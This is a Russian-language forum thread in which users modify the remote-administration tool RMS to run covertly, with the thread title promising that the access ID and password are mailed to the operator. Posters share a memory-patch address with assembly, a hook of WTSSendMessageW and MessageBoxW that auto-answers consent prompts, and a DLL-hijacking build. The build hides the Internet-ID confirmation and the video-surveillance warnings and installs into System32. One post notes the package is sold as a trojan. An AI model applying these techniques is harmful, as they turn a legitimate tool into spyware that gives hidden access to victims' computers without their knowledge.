RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. sk8ter
    sk8ter Новичок
    Симпатии:
    0
    скинь плиз рабочее на хп

Добавлено через 1 минуту
    там нужно редактировать через инсталшиелд удалив все ярлыли из пуска и установленных программ. я сделал у меня не заносится при установке

Последнее редактирование: 17 ноя 2012
    17 ноя 2012
  2. bayan
    bayan Новичок
    Симпатии:
    0
    а мануальчик не скинешь подробный?

26 ноя 2012
  3. scandalist
    scandalist Новичок
    Симпатии:
    3
    Кто копался в 5.3.1 версии сервера?
    Пытаюсь вылечить от InternetID предупреждения на 7 и 8.
    В целом всё выглядит так:
    Rutserv вызывает csrss.exe а тот создает thread и из DLL winsrv.dll вызывает окно через API user32.MessageBoxTimeoutW.
    Я пытаюсь перехватить эту API библиотекой apihijack.cpp но безрезультатно. Что за нах?

Последнее редактирование: 28 ноя 2012
    28 ноя 2012
  4. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    а как вообще добиться этого предупреждения? а то у меня ничего не вылазит.

29 ноя 2012
  5. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Народ у кого-нибудь осталась статья как переименовать rfusclient.exe , rutserv.exe hex редактором?

1 дек 2012
  6. scalpel
    scalpel Новичок
    Симпатии:
    4
    scandalist!
    Все как и раньше.Нужно перехватывать функу MessageBoxW и еах должен возвращать
    6.

1 дек 2012
  7. scandalist
    scandalist Новичок
    Симпатии:
    3
    Начиная с версии 5.3 на Win 7 и 8 oledlg.dll не работает, так что мимо. Окно сообщения об отправке имеет родителем процесс csrss.exe Наблюдение за вызываемыми API показало:
    Лезть в память процесса csrss не получается, вероятно нужны права отладчика.

2 дек 2012
  8. andersen62
    andersen62 Новичок
    Симпатии:
    7
    scandalist,
    у меня 5.3 проверял на win 7 8 oledlg.dll работает

2 дек 2012
  9. scandalist
    scandalist Новичок
    Симпатии:
    3
    Не понимаю, почему у меня не пашет. И у других, с сообщения #1238 жалобы.
    Может у вас в режиме совместимости с XP запускается или из без админских полномочий?

3 дек 2012
  10. scalpel
    scalpel Новичок
    Симпатии:
    4
    scandalist!
    А что те мешает пропатчить в памяти функцию по адресу 006F5240 в самом rutserv.exe,которая вызывается 2 раза,один для xp,другой для систем выше.Заходишь по этому адресу и
    в самом начале делаешь вот так:
    mov eax,6
    ret
    Можно и по другому извратится,но так проще.

Последнее редактирование: 3 дек 2012
    3 дек 2012
  11. scandalist
    scandalist Новичок
    Симпатии:
    3
    Можно попробовать, но такой патч в памяти сработает только для этой версии. Надо придумывать поиск в памяти нужного паттерна, а я недостаточно сведущ в программировании, точнее практически ноль.
    К тому же начало этой подпрограммы банальное и встречается как минимум 10 раз.
    Надо дальше думать.
    UPD. Этот патч работает для XP и 7. Осталось понять как сделать его универсальным.

Последнее редактирование: 4 дек 2012
    4 дек 2012
  12. scalpel
    scalpel Новичок
    Симпатии:
    4
    Все правильно!Для универсальности надо перехватывать функу WTSSendMessageW,которая и создает это сообщение на 7 и в своем обработчике делать вот так:

proc NewWTSSendMessage Server,SessionId,Title,TitleLengt,Message,MessageLength,Style,Timeout,Response,Wait
    mov edx,[Response]
    mov dword[edx],6
    mov eax,1
    ret

В аттаче тестовая дллка кторая в зависимости от версии системы перехватывает нужную функу.

http://www.sendspace.com/file/321nor

5 дек 2012
  13. scandalist
    scandalist Новичок
    Симпатии:
    3
    Библиотека работает, но как я понял глушит все WTSSendMessageW и MessageBoxW без разбору.
    Как я понял написана библиотека на FASM, я пытался на С++ сделать, но не получается перехватить WTSSendMessageW.
    Как я понимаю, поскольку WTSSendMessageW нет в импорте rutserv.exe то этот хук надо делать глобальным?
    В указанной библиотеке перехват делается через установку INT3 на вызов функции, а потом через перехватчик обрабатывается.

5 дек 2012
  14. димон
    димон Новичок
    Симпатии:
    0
    проблеми с скачиванием (нажимаю скачать - не скачиваит)

5 дек 2012
  15. scalpel
    scalpel Новичок
    Симпатии:
    4
    Совершенно верно,но это не влияет на работоспособность программы,да и не нужны какие либо сообщения.Ну если так хочется,то можно и фильтровать по характеристике мессаги.
    Все можно перехватить,хоть на си,хоть на басике.Это говорит лишь о том,что у тебя не достаточно знаний по этой теме.
    Хук не глобальный,а локальный,только для одного приложения,а не системы в целом.Недостаток многих апи шпионов в том,что они смотрят только в импорт,а если апишки вызываются динамически,то оказываются бесполезными.
    Да,там используется векторная обработка исключений,ставится INT3 бряк на начало функции,а затем обрабатывается и переходит на заглушки,которые только очищают стек и возвращают нужный результат.
    Оригинальные апишки не вызываются.В данном случае,просто нет в этом необходимости.

Добавлено через 4 минуты
    Все нормально качается.

Последнее редактирование: 6 дек 2012
    6 дек 2012
  16. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    то можно мониторить getprocaddress, если уж копаться только в импорте.
    правда не ясно, что скажет рмс на нуль.

6 дек 2012
  17. peskot
    peskot Новичок
    Симпатии:
    0
    при когда инсталюю серв выскакивает [​IMG]
    как убрать?

28 дек 2012
  18. scandalist
    scandalist Новичок
    Симпатии:
    3
    Новогодняя сборка.

C Новым Годом!
    Решил к празднику выложить последнюю версию сервера. Ссылка.
    Разворачивается в System32/Sysfiles Виртуальный принтер удален.
    Не показывает подтверждение InternetID. Не показывает предупреждения о видео наблюдении. Файлы сервера не изменялись.
    Вся магия в msimg32.dll, совместима с версией сервера 5.3.0 и выше.
    Библиотека msvcr100.dll добавлена, так как сервер не хотел стартовать на Windows 8. Протестировано на WinXP-32bit, Win7-32bit, Win8-32bit.

P.S. Перехва API не увенчался успехом, пришлось по старинке патчем в памяти.

Последнее редактирование: 1 янв 2013
    31 дек 2012
    1 человеку нравится это.
  19. scalpel
    scalpel Новичок
    Симпатии:
    4
    scandalist
    А что помешало тебе перехватить сами апишки в стиле сплайсинга?Исходные коды движков на cpp раскиданы в интернете.Имена в экспорте твоей прокси длл указывают на пустые заглушки.Нет джампов на оригинальные функции.Может тут это и проканает,но в других случаях,когда прога будет обращаться к этим функциям,могут возникнуть траблы.
    По поводу универсальности,ты уверен,что в других версиях RMS,код будет распологаться по той же величине относительно данных?
    Прикладываю аттач с тулузами для автоматического создания враппера.
    http://www.sendspace.com/file/jemp50

2 янв 2013
  20. scandalist
    scandalist Новичок
    Симпатии:
    3
    Инструкция актуальна, с учетом того, разумеется,
    что всё необходимое скачалось одним архивом.

Уж поверьте, я перепробовал все варианты на С++ создать перехват API которые смог найти в сети начиная от mhook и кончая MSDetours. У меня не получилось собрать работающий проект, то не всё API перехватывает, то валится с ошибкой в памяти. То на XP работает, а на 7 валится, то библиотеки для другой версии VStudio. И согласитесь, тупо копипастить исходники кода из примеров к различным статьям бесполезно, там как правило ошибки щедрыми горстями и синтаксические и функциональные. И без хорошего знания С++ нельзя обойтись, а я ещё раз повторю, я в программировании вообще и на С++ в частности, как свинья в апельсинах, я компилятор в октябре установил, причем искал его в Google по словам "Хороший компилятор С++" *xD*.
    Возможно и заглушки функций, я не знаю. Есть такая пословица: Поэт пишет - что чувствует, писатель - что видит, а программист - что прочитал. Вот и я написал, что прочитал. Не думаю, что GradientFill, AlphaBlend, TransparentBlt что бы они не делали, сильно повредят функционалу сервера, который вообще-то должен сидеть и не отсвечивать.
    Так я и написал, что для сервера старше 5.3.0 там они чутка поменяли процедуру в подпрограмме запроса Internet-ID, видимо Win7/8 совместимость добавляли. В процедуре окна предупреждения о видеонаблюдении ничего с 5.2.1 не менялось, а может и раньше я не проверял. Если в новой версии что-то поменяют, перепишу библиотеку. Это заодно защита от тех алёшек, которые пакет как свой навороченный троян продают. Я хотел его даже к конкретной версии сервера привязать, но поленился.
    Wrapper я посмотрю, если мне подскажут, для чего он пытается подключиться к сети и мониторить нажатия клавиш.

Последнее редактирование: 3 янв 2013
    3 янв 2013
Статус темы:
Закрыта.
Загрузка...